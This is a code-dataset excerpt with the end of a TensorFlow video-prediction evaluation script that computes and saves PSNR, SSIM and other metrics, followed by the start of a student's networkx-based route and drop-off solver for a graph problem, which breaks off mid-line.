np.array(enses)\n stds = np.std(enses, axis=0)\n stds = np.mean(stds, axis=(1, 2, 3))\n f.write(\"{0}_{1}: {2}\\n {3} \\n\\n\".format(sample_start_ind, j, stds, np.mean(stds)))\n f.close()\n imageio.mimsave('{0}_{1}_{2}.gif'.format(prefix_fname, sample_start_ind, j), group)\n #for i in range(len(group)):\n #imageio.mimsave('{0}_{1}_{2}_{3}.gif'.format(prefix_fname, sample_start_ind, j, i), group[i])\n #print(\"GIF IMAGES SHAPE AFTER: {}\".format(np.array(group[i]).shape))\n numpy_name = '{}.npy'.format(prefix_fname)\n stds = np.expand_dims(stds, 0)\n if not os.path.isfile(numpy_name):\n data = stds\n np.save(numpy_name, data)\n else:\n data = np.load(numpy_name)\n data = np.concatenate([data, stds], axis=0)\n np.save(numpy_name, data)\n\n\n\ndef save_metrics(prefix_fname, metrics, sample_start_ind=0):\n head, tail = os.path.split(prefix_fname)\n if head and not os.path.exists(head):\n os.makedirs(head)\n assert metrics.ndim == 2\n file_mode = 'w' if sample_start_ind == 0 else 'a'\n with open('%s.csv' % prefix_fname, file_mode, newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter='\\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n if sample_start_ind == 0:\n writer.writerow(map(str, ['sample_ind'] + list(range(metrics.shape[1])) + ['mean']))\n for i, metrics_row in enumerate(metrics):\n writer.writerow(map(str, [sample_start_ind + i] + list(metrics_row) + [np.mean(metrics_row)]))\n\n\ndef load_metrics(prefix_fname):\n with open('%s.csv' % prefix_fname, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t', quotechar='|')\n rows = list(reader)\n # skip header (first row), indices (first column), and means (last column)\n metrics = np.array(rows)[1:, 1:-1].astype(np.float32)\n return metrics\n\n\ndef merge_hparams(hparams0, hparams1):\n hparams0 = hparams0 or []\n hparams1 = hparams1 or []\n if not isinstance(hparams0, (list, tuple)):\n hparams0 = [hparams0]\n if not isinstance(hparams1, (list, tuple)):\n hparams1 = [hparams1]\n hparams = list(hparams0) + list(hparams1)\n # simplify into the content if possible\n if len(hparams) == 1:\n hparams, = hparams\n return hparams\n\n\ndef save_prediction_eval_results(task_dir, results, model_hparams, sample_start_ind=0, only_metrics=False, subtasks=None, ensemble=False):\n context_frames = model_hparams.context_frames\n context_images = results['images'][:, :context_frames]\n images = results['eval_images']\n metric_names = ['psnr', 'ssim', 'ssim_scikit', 'ssim_finn', 'vgg_csim']\n metric_fns = [metrics.peak_signal_to_noise_ratio_np,\n metrics.structural_similarity_np,\n metrics.structural_similarity_scikit_np,\n metrics.structural_similarity_finn_np,\n None]\n subtasks = subtasks or ['max']\n for metric_name, metric_fn in zip(metric_names, metric_fns):\n for subtask in subtasks:\n subtask_dir = task_dir + '_%s_%s' % (metric_name, subtask)\n gen_images = results.get('eval_gen_images_%s/%s' % (metric_name, subtask), results.get('eval_gen_images'))\n if metric_fn is not None: # recompute using numpy implementation\n metric = metric_fn(images, gen_images, keep_axis=(0, 1))\n else:\n metric = results['eval_%s/%s' % (metric_name, subtask)]\n save_metrics(os.path.join(subtask_dir, 'metrics', metric_name),\n metric, sample_start_ind=sample_start_ind)\n if only_metrics:\n continue\n\n save_image_sequences(os.path.join(subtask_dir, 'inputs', 'context_image'),\n context_images, sample_start_ind=sample_start_ind, ensemble=ensemble)\n save_image_sequences(os.path.join(subtask_dir, 'outputs', 'gen_image'),\n gen_images, sample_start_ind=sample_start_ind, ensemble=ensemble)\n\n\ndef save_prediction_results(task_dir, results, model_hparams, sample_start_ind=0, only_metrics=False):\n context_frames = model_hparams.context_frames\n sequence_length = model_hparams.sequence_length\n context_images, images = np.split(results['images'], [context_frames], axis=1)\n gen_images = results['gen_images'][:, context_frames - sequence_length:]\n psnr = metrics.peak_signal_to_noise_ratio_np(images, gen_images, keep_axis=(0, 1))\n mse = metrics.mean_squared_error_np(images, gen_images, keep_axis=(0, 1))\n ssim = metrics.structural_similarity_np(images, gen_images, keep_axis=(0, 1))\n save_metrics(os.path.join(task_dir, 'metrics', 'psnr'),\n psnr, sample_start_ind=sample_start_ind)\n save_metrics(os.path.join(task_dir, 'metrics', 'mse'),\n mse, sample_start_ind=sample_start_ind)\n save_metrics(os.path.join(task_dir, 'metrics', 'ssim'),\n ssim, sample_start_ind=sample_start_ind)\n if only_metrics:\n return\n\n save_image_sequences(os.path.join(task_dir, 'inputs', 'context_image'),\n context_images, sample_start_ind=sample_start_ind)\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_image'),\n gen_images, sample_start_ind=sample_start_ind)\n\n\ndef save_motion_results(task_dir, results, model_hparams, draw_center=False,\n sample_start_ind=0, only_metrics=False):\n context_frames = model_hparams.context_frames\n sequence_length = model_hparams.sequence_length\n pix_distribs = results['pix_distribs'][:, context_frames:]\n gen_pix_distribs = results['gen_pix_distribs'][:, context_frames - sequence_length:]\n pix_dist = metrics.expected_pixel_distance_np(pix_distribs, gen_pix_distribs, keep_axis=(0, 1))\n save_metrics(os.path.join(task_dir, 'metrics', 'pix_dist'),\n pix_dist, sample_start_ind=sample_start_ind)\n if only_metrics:\n return\n\n context_images, images = np.split(results['images'], [context_frames], axis=1)\n gen_images = results['gen_images'][:, context_frames - sequence_length:]\n initial_pix_distrib = results['pix_distribs'][:, 0:1]\n num_motions = pix_distribs.shape[-1]\n for i in range(num_motions):\n output_name_posfix = '%d' % i if num_motions > 1 else ''\n centers = compute_expectation_np(initial_pix_distrib[..., i:i + 1]) if draw_center else None\n save_image_sequences(os.path.join(task_dir, 'inputs', 'pix_distrib%s' % output_name_posfix),\n context_images[:, 0:1], initial_pix_distrib[..., i:i + 1], centers, sample_start_ind=sample_start_ind)\n centers = compute_expectation_np(gen_pix_distribs[..., i:i + 1]) if draw_center else None\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_pix_distrib%s' % output_name_posfix),\n gen_images, gen_pix_distribs[..., i:i + 1], centers, sample_start_ind=sample_start_ind)\n\n\ndef save_servo_results(task_dir, results, model_hparams, sample_start_ind=0, only_metrics=False):\n context_frames = model_hparams.context_frames\n sequence_length = model_hparams.sequence_length\n context_images, images = np.split(results['images'], [context_frames], axis=1)\n gen_images = results['gen_images'][:, context_frames - sequence_length:]\n goal_image = results['goal_image']\n # TODO: should exclude \"context\" actions assuming that they are passed in to the network\n actions = results['actions']\n gen_actions = results['gen_actions']\n goal_image_mse = metrics.mean_squared_error_np(goal_image, gen_images[:, -1], keep_axis=0)\n action_mse = metrics.mean_squared_error_np(actions, gen_actions, keep_axis=(0, 1))\n save_metrics(os.path.join(task_dir, 'metrics', 'goal_image_mse'),\n goal_image_mse[:, None], sample_start_ind=sample_start_ind)\n save_metrics(os.path.join(task_dir, 'metrics', 'action_mse'),\n action_mse, sample_start_ind=sample_start_ind)\n if only_metrics:\n return\n\n save_image_sequences(os.path.join(task_dir, 'inputs', 'context_image'),\n context_images, sample_start_ind=sample_start_ind)\n save_image_sequences(os.path.join(task_dir, 'inputs', 'goal_image'),\n goal_image[:, None], sample_start_ind=sample_start_ind)\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_image'),\n gen_images, sample_start_ind=sample_start_ind)\n gen_image_goal_diffs = np.abs(gen_images - goal_image[:, None])\n save_image_sequences(os.path.join(task_dir, 'outputs', 'gen_image_goal_diff'),\n gen_image_goal_diffs, sample_start_ind=sample_start_ind)\n\n\ndef main():\n \"\"\"\n results_dir\n ├── output_dir # condition / method\n │ ├── prediction # task\n │ │ ├── inputs\n │ │ │ ├── context_image_00000_00.png # indexed by sample index and time step\n │ │ │ └── ...\n ��� │ ├── outputs\n │ │ │ ├── gen_image_00000_00.png # predicted images (only the ones in the loss)\n │ │ │ └── ...\n │ │ └── metrics\n │ │ ├── psnr.csv\n │ │ ├── mse.csv\n │ │ └── ssim.csv\n │ ├── prediction_eval_vgg_csim_max # task: best sample in terms of VGG cosine similarity\n │ │ ├── inputs\n │ │ │ ├── context_image_00000_00.png # indexed by sample index and time step\n │ │ │ └── ...\n │ │ ├── outputs\n │ │ │ ├── gen_image_00000_00.png # predicted images (only the ones in the loss)\n │ │ │ └── ...\n │ │ └── metrics\n │ │ └── vgg_csim.csv\n │ ├── servo\n │ │ ├── inputs\n │ │ │ ├── context_image_00000_00.png\n │ │ │ ├── ...\n │ │ │ ├── goal_image_00000_00.png # only one goal image per sample\n │ │ │ └── ...\n │ │ ├── outputs\n │ │ │ ├── gen_image_00000_00.png\n │ │ │ ├── ...\n │ │ │ ├── gen_image_goal_diff_00000_00.png\n │ │ │ └── ...\n │ │ └── metrics\n │ │ ├── action_mse.csv\n │ │ └── goal_image_mse.csv\n │ ├── motion\n │ │ ├── inputs\n │ │ │ ├── pix_distrib_00000_00.png\n │ │ │ └── ...\n │ │ ├── outputs\n │ │ │ ├── gen_pix_distrib_00000_00.png\n │ │ │ ├── ...\n │ │ │ ├── gen_pix_distrib_overlaid_00000_00.png\n │ │ │ └── ...\n │ │ └── metrics\n │ │ └── pix_dist.csv\n │ └── ...\n └── ...\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, required=True, help=\"either a directory containing subdirectories \"\n \"train, val, test, etc, or a directory containing \"\n \"the tfrecords\")\n parser.add_argument(\"--results_dir\", type=str, default='results', help=\"ignored if output_dir is specified\")\n parser.add_argument(\"--output_dir\", help=\"output directory where results are saved. default is results_dir/model_fname, \"\n \"where model_fname is the directory name of checkpoint\")\n parser.add_argument(\"--checkpoint\", help=\"directory with checkpoint or checkpoint name (e.g. checkpoint_dir/model-200000)\")\n\n parser.add_argument(\"--mode\", type=str, choices=['val', 'test'], default='val', help='mode for dataset, val or test.')\n\n parser.add_argument(\"--dataset\", type=str, help=\"dataset class name\")\n parser.add_argument(\"--dataset_hparams\", type=str, help=\"a string of comma separated list of dataset hyperparameters\")\n parser.add_argument(\"--model\", type=str, help=\"model class name\")\n parser.add_argument(\"--model_hparams\", type=str, help=\"a string of comma separated list of model hyperparameters\")\n\n parser.add_argument(\"--batch_size\", type=int, default=8, help=\"number of samples in batch\")\n parser.add_argument(\"--num_samples\", type=int, help=\"number of samples in total (all of them by default)\")\n parser.add_argument(\"--num_epochs\", type=int, default=1)\n\n parser.add_argument(\"--tasks\", type=str, nargs='+', help='tasks to evaluate (e.g. prediction, prediction_eval, servo, motion)')\n parser.add_argument(\"--eval_substasks\", type=str, nargs='+', default=['max', 'min'], help='subtasks to evaluate (e.g. max, avg, min). only applicable to prediction_eval')\n parser.add_argument(\"--only_metrics\", action='store_true')\n parser.add_argument(\"--num_stochastic_samples\", type=int, default=100)\n\n parser.add_argument(\"--gt_inputs_dir\", type=str, help=\"directory containing input ground truth images for ismple dataset\")\n parser.add_argument(\"--gt_outputs_dir\", type=str, help=\"directory containing output ground truth images for ismple dataset\")\n\n parser.add_argument(\"--eval_parallel_iterations\", type=int, default=10)\n parser.add_argument(\"--gpu_mem_frac\", type=float, default=0, help=\"fraction of gpu memory to use\")\n parser.add_argument(\"--seed\", type=int, default=7)\n\n parser.add_argument(\"--ensemble\", action='store_true')\n\n args = parser.parse_args()\n\n if args.seed is not None:\n tf.set_random_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n\n dataset_hparams_dict = {}\n model_hparams_dict = {}\n if args.checkpoint:\n checkpoint_dir = os.path.normpath(args.checkpoint)\n if not os.path.exists(checkpoint_dir):\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), checkpoint_dir)\n if not os.path.isdir(args.checkpoint):\n checkpoint_dir, _ = os.path.split(checkpoint_dir)\n with open(os.path.join(checkpoint_dir, \"options.json\")) as f:\n print(\"loading options from checkpoint %s\" % args.checkpoint)\n options = json.loads(f.read())\n args.dataset = args.dataset or options['dataset']\n args.model = args.model or options['model']\n try:\n with open(os.path.join(checkpoint_dir, \"dataset_hparams.json\")) as f:\n dataset_hparams_dict = json.loads(f.read())\n except FileNotFoundError:\n print(\"dataset_hparams.json was not loaded because it does not exist\")\n try:\n with open(os.path.join(checkpoint_dir, \"model_hparams.json\")) as f:\n model_hparams_dict = json.loads(f.read())\n model_hparams_dict.pop('num_gpus', None) # backwards-compatibility\n except FileNotFoundError:\n print(\"model_hparams.json was not loaded because it does not exist\")\n args.output_dir = args.output_dir or os.path.join(args.results_dir, os.path.split(checkpoint_dir)[1])\n else:\n if not args.dataset:\n raise ValueError('dataset is required when checkpoint is not specified')\n if not args.model:\n raise ValueError('model is required when checkpoint is not specified')\n args.output_dir = args.output_dir or os.path.join(args.results_dir, 'model.%s' % args.model)\n\n print('----------------------------------- Options ------------------------------------')\n for k, v in args._get_kwargs():\n print(k, \"=\", v)\n print('------------------------------------- End --------------------------------------')\n\n VideoDataset = datasets.get_dataset_class(args.dataset)\n dataset = VideoDataset(args.input_dir, mode=args.mode, num_epochs=args.num_epochs, seed=args.seed,\n hparams_dict=dataset_hparams_dict, hparams=args.dataset_hparams)\n\n def override_hparams_dict(dataset):\n hparams_dict = dict(model_hparams_dict)\n hparams_dict['context_frames'] = dataset.hparams.context_frames\n hparams_dict['sequence_length'] = dataset.hparams.sequence_length\n hparams_dict['repeat'] = dataset.hparams.time_shift\n return hparams_dict\n\n VideoPredictionModel = models.get_model_class(args.model)\n model = VideoPredictionModel(mode='test', hparams_dict=override_hparams_dict(dataset), hparams=args.model_hparams,\n eval_num_samples=args.num_stochastic_samples, eval_parallel_iterations=args.eval_parallel_iterations)\n context_frames = model.hparams.context_frames\n sequence_length = model.hparams.sequence_length\n\n if args.num_samples:\n if args.num_samples > dataset.num_examples_per_epoch():\n raise ValueError('num_samples cannot be larger than the dataset')\n num_examples_per_epoch = args.num_samples\n else:\n num_examples_per_epoch = dataset.num_examples_per_epoch()\n # if num_examples_per_epoch % args.batch_size != 0:\n # raise ValueError('batch_size should evenly divide the dataset')\n if args.ensemble:\n assert args.batch_size % model.num_ensembles == 0, \"batchsize should be evenly divided by num_ensembles\"\n inputs, target = dataset.make_batch(args.batch_size // model.num_ensembles)\n else:\n inputs, target = dataset.make_batch(args.batch_size)\n\n if not isinstance(model, models.GroundTruthVideoPredictionModel):\n # remove ground truth data past context_frames to prevent accidentally using it\n for k, v in inputs.items():\n if k != 'actions':\n inputs[k] = v[:, :context_frames]\n\n if args.ensemble:\n for k, v in inputs.items():\n tiling = [1 for _ in range(len(v.shape))]\n tiling[0] = model.num_ensembles\n inputs[k] = tf.tile(v, tiling)\n \n tiling = [1 for _ in range(len(target.shape))]\n tiling[0] = model.num_ensembles\n target = tf.tile(target, tiling)\n \n \n input_phs = {k: tf.placeholder(v.dtype, v.shape, '%s_ph' % k) for k, v in inputs.items()}\n target_ph = tf.placeholder(target.dtype, target.shape, 'targets_ph')\n\n with tf.variable_scope(''):\n model.build_graph(input_phs, target_ph)\n\n tasks = args.tasks\n if tasks is None:\n tasks = ['prediction_eval']\n if 'pix_distribs' in inputs:\n tasks.append('motion')\n\n if 'servo' in tasks:\n servo_model = VideoPredictionModel(mode='test', hparams_dict=model_hparams_dict, hparams=args.model_hparams)\n cem_batch_size = 200\n plan_horizon = sequence_length - 1\n image_shape = inputs['images'].shape.as_list()[2:]\n state_shape = inputs['states'].shape.as_list()[2:]\n action_shape = inputs['actions'].shape.as_list()[2:]\n servo_input_phs = {\n 'images': tf.placeholder(tf.float32, shape=[cem_batch_size, context_frames] + image_shape),\n 'states': tf.placeholder(tf.float32, shape=[cem_batch_size, 1] + state_shape),\n 'actions': tf.placeholder(tf.float32, shape=[cem_batch_size, plan_horizon] + action_shape),\n }\n if isinstance(servo_model, models.GroundTruthVideoPredictionModel):\n images_shape = inputs['images'].shape.as_list()[1:]\n servo_input_phs['images'] = tf.placeholder(tf.float32, shape=[cem_batch_size] + images_shape)\n with tf.variable_scope('', reuse=True):\n servo_model.build_graph(servo_input_phs)\n\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n with open(os.path.join(output_dir, \"options.json\"), \"w\") as f:\n f.write(json.dumps(vars(args), sort_keys=True, indent=4))\n with open(os.path.join(output_dir, \"dataset_hparams.json\"), \"w\") as f:\n f.write(json.dumps(dataset.hparams.values(), sort_keys=True, indent=4))\n with open(os.path.join(output_dir, \"model_hparams.json\"), \"w\") as f:\n f.write(json.dumps(model.hparams.values(), sort_keys=True, indent=4))\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_mem_frac)\n config = tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True)\n sess = tf.Session(config=config)\n\n model.restore(sess, args.checkpoint)\n\n if 'servo' in tasks:\n servo_policy = ServoPolicy(servo_model, sess)\n\n sample_ind = 0\n while True:\n if args.num_samples and sample_ind >= args.num_samples:\n break\n try:\n input_results, target_result = sess.run([inputs, target])\n except tf.errors.OutOfRangeError:\n break\n print(\"evaluation samples from %d to %d\" % (sample_ind, sample_ind + args.batch_size))\n\n if 'prediction_eval' in tasks:\n feed_dict = {input_ph: input_results[name] for name, input_ph in input_phs.items()}\n feed_dict.update({target_ph: target_result})\n # compute \"best\" metrics using the computation graph (if available) or explicitly with python logic\n if model.eval_outputs and model.eval_metrics:\n fetches = {'images': model.inputs['images']}\n fetches.update(model.eval_outputs.items())\n fetches.update(model.eval_metrics.items())\n results = sess.run(fetches, feed_dict=feed_dict)\n else:\n metric_names = ['psnr', 'ssim', 'ssim_scikit', 'ssim_finn', 'vgg_csim']\n metric_fns = [metrics.peak_signal_to_noise_ratio_np,\n metrics.structural_similarity_np,\n metrics.structural_similarity_scikit_np,\n metrics.structural_similarity_finn_np,\n metrics.vgg_cosine_similarity_np]\n\n all_gen_images = []\n all_metrics = [np.empty((args.num_stochastic_samples, args.batch_size, sequence_length - context_frames)) for _ in metric_names]\n for s in range(args.num_stochastic_samples):\n gen_images = sess.run(model.outputs['gen_images'], feed_dict=feed_dict)\n all_gen_images.append(gen_images)\n for metric_name, metric_fn, all_metric in zip(metric_names, metric_fns, all_metrics):\n metric = metric_fn(gen_images, target_result, keep_axis=(0, 1))\n all_metric[s] = metric\n\n results = {}\n for metric_name, all_metric in zip(metric_names, all_metrics):\n for subtask in args.eval_substasks:\n results['eval_gen_images_%s/%s' % (metric_name, subtask)] = np.empty_like(all_gen_images[0])\n results['eval_%s/%s' % (metric_name, subtask)] = np.empty_like(all_metric[0])\n\n for i in range(args.batch_size):\n for metric_name, all_metric in zip(metric_names, all_metrics):\n ordered = np.argsort(np.mean(all_metric, axis=-1)[:, i]) # mean over time and sort over samples\n for subtask in args.eval_substasks:\n if subtask == 'max':\n sidx = ordered[-1]\n elif subtask == 'min':\n sidx = ordered[0]\n else:\n raise NotImplementedError\n results['eval_gen_images_%s/%s' % (metric_name, subtask)][i] = all_gen_images[sidx][i]\n results['eval_%s/%s' % (metric_name, subtask)][i] = all_metric[sidx][i]\n # CHANGE THE BELOW STUFF INTO A GIF IF ARGS IS IN ENSEMBLE\n save_prediction_eval_results(os.path.join(output_dir, 'prediction_eval'),\n results, model.hparams, sample_ind, args.only_metrics, args.eval_substasks, ensemble=args.ensemble)\n\n if 'prediction' in tasks or 'motion' in tasks: # do these together\n feed_dict = {input_ph: input_results[name] for name, input_ph in input_phs.items()}\n fetches = {'images': model.inputs['images'],\n 'gen_images': model.outputs['gen_images']}\n if 'motion' in tasks:\n fetches.update({'pix_distribs': model.inputs['pix_distribs'],\n 'gen_pix_distribs': model.outputs['gen_pix_distribs']})\n\n if args.num_stochastic_samples:\n all_results = [sess.run(fetches, feed_dict=feed_dict) for _ in range(args.num_stochastic_samples)]\n all_results = nest.map_structure(lambda *x: np.stack(x), *all_results)\n all_context_images, all_images = np.split(all_results['images'], [context_frames], axis=2)\n all_gen_images = all_results['gen_images'][:, :, context_frames - sequence_length:]\n all_mse = metrics.mean_squared_error_np(all_images, all_gen_images, keep_axis=(0, 1))\n all_mse_argsort = np.argsort(all_mse, axis=0)\n\n for subtask, argsort_ind in zip(['_best', '_median', '_worst'],\n [0, args.num_stochastic_samples // 2, -1]):\n all_mse_inds = all_mse_argsort[argsort_ind]\n gather = lambda x: np.array([x[ind, sample_ind] for sample_ind, ind in enumerate(all_mse_inds)])\n results = nest.map_structure(gather, all_results)\n if 'prediction' in tasks:\n save_prediction_results(os.path.join(output_dir, 'prediction' + subtask),\n results, model.hparams, sample_ind, args.only_metrics)\n if 'motion' in tasks:\n draw_center = isinstance(model, models.NonTrainableVideoPredictionModel)\n save_motion_results(os.path.join(output_dir, 'motion' + subtask),\n results, model.hparams, draw_center, sample_ind, args.only_metrics)\n else:\n results = sess.run(fetches, feed_dict=feed_dict)\n if 'prediction' in tasks:\n save_prediction_results(os.path.join(output_dir, 'prediction'),\n results, model.hparams, sample_ind, args.only_metrics)\n if 'motion' in tasks:\n draw_center = isinstance(model, models.NonTrainableVideoPredictionModel)\n save_motion_results(os.path.join(output_dir, 'motion'),\n results, model.hparams, draw_center, sample_ind, args.only_metrics)\n\n if 'servo' in tasks:\n images = input_results['images']\n states = input_results['states']\n gen_actions = []\n gen_images = []\n for images_, states_ in zip(images, states):\n obs = {'context_images': images_[:context_frames],\n 'context_state': states_[0],\n 'goal_image': images_[-1]}\n if isinstance(servo_model, models.GroundTruthVideoPredictionModel):\n obs['context_images'] = images_\n gen_actions_, gen_images_ = servo_policy.act(obs, servo_model.outputs['gen_images'])\n gen_actions.append(gen_actions_)\n gen_images.append(gen_images_)\n gen_actions = np.stack(gen_actions)\n gen_images = np.stack(gen_images)\n results = {'images': input_results['images'],\n 'actions': input_results['actions'],\n 'goal_image': input_results['images'][:, -1],\n 'gen_actions': gen_actions,\n 'gen_images': gen_images}\n save_servo_results(os.path.join(output_dir, 'servo'),\n results, servo_model.hparams, sample_ind, args.only_metrics)\n\n sample_ind += args.batch_size\n\n metric_fnames = []\n if 'prediction_eval' in tasks:\n metric_names = ['psnr', 'ssim', 'ssim_finn', 'vgg_csim']\n subtasks = ['max']\n for metric_name in metric_names:\n for subtask in subtasks:\n metric_fnames.append(\n os.path.join(output_dir, 'prediction_eval_%s_%s' % (metric_name, subtask), 'metrics', metric_name))\n if 'prediction' in tasks:\n subtask = '_best' if args.num_stochastic_samples else ''\n metric_fnames.extend([\n os.path.join(output_dir, 'prediction' + subtask, 'metrics', 'psnr'),\n os.path.join(output_dir, 'prediction' + subtask, 'metrics', 'mse'),\n os.path.join(output_dir, 'prediction' + subtask, 'metrics', 'ssim'),\n ])\n if 'motion' in tasks:\n subtask = '_best' if args.num_stochastic_samples else ''\n metric_fnames.append(os.path.join(output_dir, 'motion' + subtask, 'metrics', 'pix_dist'))\n if 'servo' in tasks:\n metric_fnames.append(os.path.join(output_dir, 'servo', 'metrics', 'goal_image_mse'))\n metric_fnames.append(os.path.join(output_dir, 'servo', 'metrics', 'action_mse'))\n\n for metric_fname in metric_fnames:\n task_name, _, metric_name = metric_fname.split('/')[-3:]\n metric = load_metrics(metric_fname)\n print('=' * 31)\n print(task_name, metric_name)\n print('-' * 31)\n metric_header_format = '{:>10} {:>20}'\n metric_row_format = '{:>10} {:>10.4f} ({:>7.4f})'\n print(metric_header_format.format('time step', os.path.split(metric_fname)[1]))\n for t, (metric_mean, metric_std) in enumerate(zip(metric.mean(axis=0), metric.std(axis=0))):\n print(metric_row_format.format(t, metric_mean, metric_std))\n print(metric_row_format.format('mean (std)', metric.mean(), metric.std()))\n print('=' * 31)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":36621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"242146296","text":"import os\nimport sys\nsys.path.append('..')\nsys.path.append('../..')\nimport argparse\nimport utils\nimport graph_maker\nimport student_utils\nimport clustering_approach\nimport graphModifier\nimport practiceSolver\n\nfrom student_utils import *\n\"\"\"\n======================================================================\n Complete the following function.\n======================================================================\n\"\"\"\n\nclass Node:\n\n def __init__(self, name, position, parent):\n self.name = name\n self.position = position\n self.parent = parent\n\n\ndef solve(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix, params=[]):\n \"\"\"\n Write your algorithm here.\n Input:\n list_of_locations: A list of locations such that node i of the graph corresponds to name at index i of the list\n list_of_homes: A list of homes\n starting_car_location: The name of the starting location for the car\n adjacency_matrix: The adjacency matrix from the input file\n Output:\n A list of locations representing the car path\n A dictionary mapping drop-off location to a list of homes of TAs that got off at that particular location\n NOTE: both outputs should be in terms of indices not the names of the locations themselves\n \"\"\"\n\n \"\"\"list_of_locations, list_of_homes_int, starting_car_location, \\\n adjacency_matrix = preProcess(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\"\"\"\n\n\n if len(list_of_locations) == 0:\n return [], {}\n\n #Do not delete next line\n # graphModifier.graphClusterer(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\n location_dict = {}\n car_start_int = 0\n\n\n list_of_homes_int = []\n list_of_locations_int = [_ for _ in range(len(list_of_locations))]\n for j in range(len(list_of_locations)):\n location_dict[j] = list_of_locations[j]\n if list_of_locations[j] == starting_car_location:\n car_start_int = j\n for _ in list_of_homes:\n if _ == list_of_locations[j]:\n list_of_homes_int += [j]\n\n\n #preProcess(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n B = clusterGraph(list_of_locations_int, list_of_homes_int, car_start_int, G)\n returner = practiceSolver.tspRepeats(B, car_start_int)\n if len(returner) == 0:\n returner = [car_start_int]\n\n finalList = [returner[0]]\n for i in range(len(returner)-1):\n finalList += nx.shortest_path(G, returner[i], returner[i+1], weight='weight')[1:]\n finalList += nx.shortest_path(G, returner[-1], returner[0], weight='weight')[1:]\n\n all_distances = dict(nx.floyd_warshall(G))\n returnMapping = {}\n for i in list_of_homes_int:\n minDist = float('inf')\n home_map = 999\n for j in finalList:\n if all_distances[i][j] < minDist:\n minDist = all_distances[i][j]\n home_map = j\n if home_map != 999:\n if not home_map in returnMapping:\n returnMapping[home_map] = [i]\n else:\n returnMapping[home_map] = returnMapping[home_map] + [i]\n\n #clustering_approach.visualize_communities_and_dropoffs(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix)\n returnList = []\n for i in finalList:\n returnList.append(location_dict[i])\n\n print(cost_of_solution(G, [int(_) for _ in finalList], returnMapping)[0])\n return [int(_) for _ in finalList], returnMapping\n\n\ndef clusterGraph(list_of_locations_int, list_of_homes_int, car_start_int, G):\n #G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n B = nx.Graph()\n clusterDict = clustering_approach.find_community_mappings(list_of_homes_int, G)\n dropoffs = clustering_approach.find_dropoff_locations(list_of_homes_int, G, car_start_int,\n clusterDict)\n all_distances = dict(nx.floyd_warshall(G))\n \"\"\" edges = {\"\"}\n edges.pop()\"\"\"\n if len(dropoffs) == 0:\n for _ in list_of_homes_int:\n for __ in list_of_homes_int:\n if not B.has_edge(_, __) and not __ == _:\n B.add_weighted_edges_from([(_, __, all_distances[_][__])])\n i = 0\n while car_start_int == list_of_homes_int[i]:\n i += 1\n B.add_weighted_edges_from([(car_start_int, list_of_homes_int[i], all_distances[car_start_int][list_of_homes_int[i]])])\n else:\n if car_start_int not in dropoffs:\n dropoffs += [car_start_int]\n for _ in dropoffs:\n for __ in dropoffs:\n if not B.has_edge(_, __) and not __ == _:\n B.add_weighted_edges_from([(_, __, all_distances[_][__])])\n return B\n\n\n#not working!!!! fix this\ndef preProcess(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix):\n\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)\n\n location_dict = {}\n list_of_homes_int = []\n list_of_locations_int = [_ for _ in range(len(list_of_locations))]\n for j in range(len(list_of_locations)):\n location_dict[j] = list_of_locations[j]\n if list_of_locations[j] == starting_car_location:\n car_start_int = j\n for _ in list_of_homes:\n if _ == list_of_locations[j]:\n list_of_homes_int += [j]\n\n for i in list_of_homes_int:\n if G[0].degree[i] == 1:\n list_of_homes_int[i] = G.edges[i][0]\n\n return list_of_locations, list_of_homes, starting_car_location, adjacency_matrix\n\n\n\ndef dist(node1, node2):\n # using networkx shortest_path function\n return nx.shortest_path()\n\ndef trivial_output_solver(list_of_locations, list_of_homes, starting_car_location, adjacency_matrix, params=[]):\n G = student_utils.adjacency_matrix_to_graph(adjacency_matrix)[0]\n\n # helper function with access to G\n def distance_between_locations(a, b):\n path_dist = nx.shortest_path_length(G, a, b)\n # print(\"distance from \" + str(a) + \" to \" + str(b) + \": \", path_dist)\n return path_dist\n\n # either proceed linearly through list of homes or through shuffled list of homes\n randomized_homes = np.random.shuffle(list_of_homes)\n homes = list_of_homes\n\n # using approximated average clustering for G:\n clustering_coeffs = nx.clustering(G)\n print(\"approximated average clustering coefficient:\", clustering_coeffs)\n home_coeffs = {int(h): clustering_coeffs[int(h)] for h in homes}\n print(\"home clustering coeffs:\", home_coeffs)\n\n # using the Girvan–Newman method to find communities of graphs\n # define custom function for how to select edges to remove in the algorithm\n def most_central_edge(G):\n centrality = nx.edge_betweenness_centrality(G, normalized=False, weight='weight')\n max_cent = max(centrality.values())\n # Scale the centrality values so they are between 0 and 1,\n # and add some random noise.\n centrality = {e: c / max_cent for e, c in centrality.items()}\n # Add some random noise.\n centrality = {e: c + np.random.random() for e, c in centrality.items()}\n return max(centrality, key=centrality.get)\n\n # get only the first k tuples of communities\n k = 10\n\n comp = algos.community.centrality.girvan_newman(G, most_valuable_edge=most_central_edge)\n for communities in itertools.islice(comp, k):\n print(\"communities: \", tuple(sorted(c) for c in communities))\n\n # using A* from start to each node\n total_path = []\n current_home = homes[0]\n total_path += nx.astar_path(G, int(starting_car_location), int(current_home), distance_between_locations)\n for next_home in 